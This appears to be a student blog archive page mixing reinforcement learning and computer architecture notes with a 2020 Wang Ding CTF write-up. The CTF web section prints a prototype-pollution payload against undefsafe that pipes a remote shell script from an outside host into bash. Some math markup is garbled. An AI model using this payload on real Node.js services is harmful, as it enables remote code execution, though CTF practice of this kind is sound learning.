Computer Science - Page 7 - vickieGPT’s blog

我们可以很清楚的看到都是call 函数。我看到的源码有用intro sort 实现的gnu libcxx 也有分桶排序的llvm 的版本，可是linux distro都是出厂自带，且每个公司都会对自己的代码进行魔改。今天被dhz的问题问到了，我还是cpp学艺不精。

zlw 曾经问过我一个问题。是std::sort 非常快，且看不到源码，这和我看到的好像不太一致，我从来没调试过glibc 和libcxx.so 源码和自带的不一样，谁知道呢？

如果glibc可以插一些奇怪的东西，那就太棒了。

linux team's motto: make our guest quicker

August 17, 2020December 8, 2022

Parallel Computing Final Project FineTunedHashML Spring 2020

The final repo is stored at gitlab, added some hash function to the original algorithm.

Dear Professor,
I’m Yiwei Victor Yang 2018533218 from your parallel computing class.
My teammate and I are struggling in selecting the project. I proposed to set up a projects transplant of a CPU LSH-Deep learning (https://github.com/keroro824/HashingDeepLearning/tree/master/SLIDE), which is a technique newly proposed by Rice University and Intel co, ltd to utilize the avx512 instruction set and huge pages intrinsic in locality sensitive hashing which is the main overhead of the project. ( https://arxiv.org/pdf/1903.03129.pdf)

SLIDE is a project to reimplement BP on the CPU. After the LSH pre-processing, the paper proposed to utilize maximum inner product search (MIPS) which mainly do the Sparse matrix operations- Sparse Backpropagation or Gradient Update.

After the update of weight stored in CSR format Spmv, the paper do the Batch computing by OpenMP.

As research in the paper, we can see that the main overhead is pre-processing on CPU avx512 with huge pages cache-heap optimization on, which gained around 30% faster than the raw GPU Tesla V100. If we transplant that part(dynamic hashing) in GPU which is said not applicable by the author from intel, I think it may have a 50 percent chance to be faster than the current CPU version.
As the paper’s reference paper puts it: it gains something like 2 times faster after porting to Cuda, which triggers conflicts. https://github.com/src-d/minhashcuda

Our proposal is to make a comparison amid the raw Tensorflow on GPU, SLIDE on avx512, and SLIDE on GPU using the dataset mentioned in the paper.

My question is whether the transplant of the CPU dynamic cuckoo in the SLIDE do you think can have real speed up than the original version and if we attempted to transplant the program and get little speed up, will we eventually get the score?

Thanks a lot!

May 12, 2020February 9, 2022

[RL] Monte-Carlo Methods

Monte-Carlo RL

MC learn directly from episodes of experience.
MC is model-free. No knowledge of MDP transitions or rewraeds.
MC learns fro complete episodes. no bootstrapping
1. Here Bootstrapping means Using one or more estimated values in the update step fro the same kind of estimated value.. like in $SARSA(\lambda)$ or $Q(\lambda)$
2. The single-step TD is to utilize the bootstrap by using a mix of results from different length trajectories.
MC uses the simplest possible idea: value = mean return
2 ways:
1. model-free: no model necessary and still attains optimality
2. Simulated: needs only a simulation, not a full model
Caveat: can only apply MC to episodic MDPs
1. All episodes must terminate

policy evaluation

The goal is to learn $v_\pi$ from episodes of experience under policy $\pi$
\[S_1,A_1,R_2,....S_k \sim 1\]
and the return is the total discounted reward: $G_t=R_{t+1}+\gamma R_{t+2}+...\gamma ^{T-1}T_T$.

The value function is the expected return : $v_\pi(x)=\mathbb{E}_{\pi}[G_t~S_t=s]$
P.S. This policy use empirical mean rather than expected return.

By different visits during an episode, they can be diverged into Every-Visit and First-visit, and both converge asymptotically.

First-visit

proof of convergence

In fact it's the "backward mean $\frac{S(s)}{N(s)}$" to update $V(s)$

blackjack (21 points)

In Sutton's book, we get the exploration graph like

Every-Visit Monte-Carlo Policy Evaluation

the difference is every visits.

Incremental Mean

The mean $\mu_1,\mu_2.... $ of the sequent can be computed incrementally by

incremental MC-updates

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Similar to Bandit, is to find optimal from the explore/exploit dilemma the entire rest of episode included. and the only choice considered is at each state and doesn't bootstrap.(unlike DP).

Time required to estimate one state does not depend onthe total number of states

Temporal-Difference Learning

Bootstrapping

Saying: To lift one up, strap the boot of sb. again and again which is incompletable.

Modern definition: re-sampling technique from the same sample again and again which has the statistical meaning.

intro

TD methods learn directly from episodes of experience
TD is model-free:no knowledge of MDP transitions/rewards
TD learns from incomplete episodes, by bootstrapping
TD updates a guess towards a guess

$(number)$ the number represent the look ahead times.

driving home example

TD is more flexible for MC have to wait for the final result for the update. On policy vs. off policy.

MC make a nearest prediction

We actually can generate the estimated MDP graph and corresponding example for AB example.

Comparison

TD can learn before knowing the final outcome
1. TD can learn online after every step (less memory & peak computation)
2. MC must wait until end of episode before return is known
TD can learn without the final outcome
1. TD can learn from incomplete sequences
2. MC can only learn from complete sequences
3. TD works in continuing (non-terminating) environments
4. MC only works for episodic (terminating) environment
  ### result is TD performs better in random walk

batch MC and TD

add step parameter $\alpha$

Unified comparison

$\to$

Bootstrapping: update involves an estimate
- MC does not bootstrap
- DP bootstraps
- TD bootstraps
Sampling:update samples an expectation
- MC samples
- DP does not sample
- TD samples

n-step TD

⁃   $

\begin{array}{l}\text { n-Step Return } \ \qquad \begin{aligned} \text { Consider the following } n \text { -step returns for } n=1,2, \infty \ \qquad \begin{aligned} n=1 &(T D) & \frac{G_{t}^{{(1)}}{G_{t}^{{(2)}}=\frac{R_{t+1}+\gamma}} V\left(S_{t+1}\right)}{R_{t+1}+\gamma R_{t+2}+\gamma^{2} V\left(S_{t+2}\right)} \ & \vdots \end{aligned} \ \qquad n=\infty \quad(M C) \quad G_{t}^{{(\infty)}=R_{t+1}+\gamma} R_{t+2}+\ldots \gamma^{T-1} R_{T} \end{aligned} \ \text { - Define the } n \text { -step return } \ \qquad \underbrace{G_{t}^{{(n)}=R_{t+1}+\gamma} R_{t+2}+\ldots+\gamma^{n-1} R_{t+n}+\gamma^{n} V\left(S_{t+n}\right)}_{The\ General\ case}\ \text { - n} \text { -step temporal-difference learning } \ \qquad V\left(S_{t}\right) \leftarrow V\left(S_{t}\right)+\alpha\left(G_{t}^{{(n)}-V\left(S_{t}\right)\right)\end{array}}
$$

Reference

May 11, 2020May 11, 2020

Reflection on our 2020 Wang Ding CTF contest

Result

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

Play the game with gourgeous names in the CTF conf.

Flag in "F12"

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

not happy, it's a vm inside. From vm_operad, we have

The key is case7, we can apply the diction on a1[v10+1] to figure out what happens. So, up the OD.

Appling the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduct that case 8's to read the user's input, and make the handler as the vector handler in the OS.

the handler can be enumerated as

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h

Eventually we get the total flag{757515121f3d478}.

Web

Notes

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{ 8c46c34a-fa1f-4fc9- 81bd- 609b1aafff8a }

Crypto

boom

just play a simple game

md5:en5oy

stupid z=31,y=68, x=74

stupid Mathemetica.

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is to calculate the $m^f\equiv c\ mod\ n$

$n$ is actually $2^512$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

April 12, 2020February 9, 2022

[RL] RL Category

Following the wikipeadia

Reinforcement Learning is an area of machihne learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximzie some notion of cumulative reward.

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

behaviors that result in praise/pleasure tend to repeat
behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with Sensors end-effectors and goals

Action

Used by the agent to interact with the environment.
May have many di↵erent temporal granularities and abstractions

reward

A reward R**t is a scalar feedback signal

Indicates how well agent is doing at step t

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

dynamics are known or are estimated
solving RL problems that use models and planning

Model-free RL

unknown dynamics
explicitly trial-and-error learners

not necessarily iid

P.S. 逆强化学习。

Summary

April 11, 2020February 9, 2022

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

Multiple issue “superscalar”
- Replicate pipeline stages ⇒ multiple pipelines
- Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
- E.g., 4GHz 4-way multiple-issue
  - 16 BIPS, peak CPI = 0.25, peak IPC = 4
- But dependencies reduce this in practic
“Out-of-Order” execution
- Reorder instructions dynamically in hardware to reduce impact of hazards
Hyper-threading

Pipelining recap

pipelines complexities exlained

GPRs FPRs

More than one Functional Unit
Floating point execution!
- Fadd & Fmul: fixed number of cycles; > 1
- Fdiv: unknown number of cycles!
Memory access: on Cache miss unknown number of cycles
Issue: Assign instruction to functional unit

summary

Some static multiple issues

VLIW: very long instruction word

The solution can be easily found

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipleines need speculation

[ ] E. superscalar processor can execute

April 1, 2020February 9, 2022

[Computer Architecture] data path

intro - where are we now?

the cpu

Processor - datapath - control

cenario in RISC-V machine

The datapath and control

Overview

problem: single monolithic bloc
solution: break up the process of excuting an instruction into stages
- smaller stages are easier to design –
- easy to optimize &modularity

five stages

Instruction Fetch
- pc+=4
- take full use of mem hierarchy
Instruction Decode
read the opcode to determine instruction type and field lengths
second, (at the same time!) read in data from all necessary registers
- for add, read two registers
- for addi, read one register
third, generate the immediates
ALU
- the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
- For instance, it's load and store
  - lw t0, 40(t1)
  - the address we are accessing in memory = the value in t1 PLUS the value 40
  - so we do this addition in this stage
Mem access
- Actually only the load and store instruction do anything during this stage.
- it's fast but unavoidable
Register write
- write the result of some computation into a register.
- for stores and brances idle
  
  misc
memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

for D

for E

March 27, 2020February 9, 2022

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

They studied verilog

FSM is really similar to our homework. actually, I found that their exams is given to us for homework.

P.S.: WHY they have spring break?

run a linux on FPGA. and implement a CPU. 俗称“造机”。

If I have time, I'll implement the CPU by my own.

GPU applying the RISC-V architecture will be much better and cooler.

The more I read and learn , the more I found the knowledge in the EECS category can be nicely cascaded. In most of the cases, we get the point from another place and we can be taught within minutes.

After talking with upperclassman 罗浩聪, I guadully find my career as an PhD in Arch or PL, or sth, in between. But for now, let me finish the 2 cooperate papers.

March 26, 2020February 9, 2022

[Computer Architecture] Circuit

intro

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

switches

arrow shows action if wire changes to 1 or is asserted.

and & or

Transistors

High voltage$V_{dd}$ Low voltage $Gnd$

PWD

we implement switches using CMOS

CMOS Transistor Network

note PWD

material:

how MOSFET Operation

CMOS Networks

2 input network

combined logit symbols

example debugging waveform

types of circuits

example using time chart

March 21, 2020February 9, 2022

[Computer Architechture] call

Language Execution continuum

An interpreter is a program that executes other programs.

langurage translation gives us another option
In genreral, we interpret a high-level language to a lower-level language to increase preformance

interpretation

Python
asm

Assembler directives

pseudo-instruction replacement

what's tail's about

{...
 lots of code
 return foo(y);
}

it's recursive call to foo() if this is within foo(), or call to a different function...
for effictiency
- Evaluate the arguments for foo() in a0-a7
- return ra, all callee saved registers and sp
- Then call foo() with j or tail
when foo() returns, it can return directly to where it needs to return to
- Rather than returning to wherever foo() was called and returning from there
- Tail call optimization

branches

Linking progress

Four types of Address

PC- relative addredding (beq)

Monte-Carlo RL

policy evaluation

First-visit

proof of convergence

blackjack (21 points)

Every-Visit Monte-Carlo Policy Evaluation

Incremental Mean

incremental MC-updates

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Temporal-Difference Learning

Bootstrapping

intro

driving home example

Comparison

batch MC and TD

Unified comparison

n-step TD

Reference

Result

Misc

qiandao

Reverse

signal

Web

Notes

Crypto

boom

You Raise Me up

Reflection

Behavioral Psychology

agent

Action

reward

Main Topics of Reinforcement Learning

Summary

Greater Instruction-Level Parallelism (ILP)

Pipelining recap

pipelines complexities exlained

GPRs FPRs

summary

Some static multiple issues

VLIW: very long instruction word

Quiz

intro - where are we now?

the cpu

cenario in RISC-V machine

The datapath and control

Overview

five stages

misc

memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

intro

synchronous digital systems

switches

Transistors

CMOS Transistor Network

how MOSFET Operation

CMOS Networks

2 input network

combined logit symbols

example debugging waveform

types of circuits

example using time chart

Language Execution continuum

interpretation

Assembler directives